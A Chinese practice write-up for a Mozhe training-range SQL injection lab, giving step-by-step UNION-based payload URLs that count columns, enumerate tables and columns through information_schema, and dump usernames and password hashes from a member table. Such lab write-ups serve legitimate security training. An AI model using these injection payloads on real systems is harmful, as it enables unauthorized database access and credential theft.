sql手工注入漏洞测试(MYSQL)-墨者-url信息

背景:

自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

bash 复制代码
数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

相关推荐
霖霖总总1 小时前
[小技巧19]MySQL 权限管理全指南:用户、角色、授权与安全实践
数据库·mysql·安全
heartbeat..5 小时前
Spring AOP 全面详解(通俗易懂 + 核心知识点 + 完整案例)
java·数据库·spring·aop
晓幂7 小时前
【2025】HECTF
笔记·学习·web安全
上海云盾-高防顾问7 小时前
中小企业低成本渗透测试实操指南
网络协议·web安全·网络安全
猿小路7 小时前
抓包工具-Wireshark
网络·测试工具·wireshark
Rabbit_QL7 小时前
【网络设置】Docker 自定义网络深度解析:从踩坑到工程实践
网络·docker·容器
麦聪聊数据7 小时前
MySQL并发与锁:从“防止超卖”到排查“死锁”
数据库·sql·mysql
tianyuanwo8 小时前
合并XFS分区:将独立分区安全融入LVM的完整指南
安全·lvm
智驱力人工智能8 小时前
守护流动的规则 基于视觉分析的穿越导流线区检测技术工程实践 交通路口导流区穿越实时预警技术 智慧交通部署指南
人工智能·opencv·安全·目标检测·计算机视觉·cnn·边缘计算
AC赳赳老秦8 小时前
DeepSeek 私有化部署避坑指南:敏感数据本地化处理与合规性检测详解
大数据·开发语言·数据库·人工智能·自动化·php·deepseek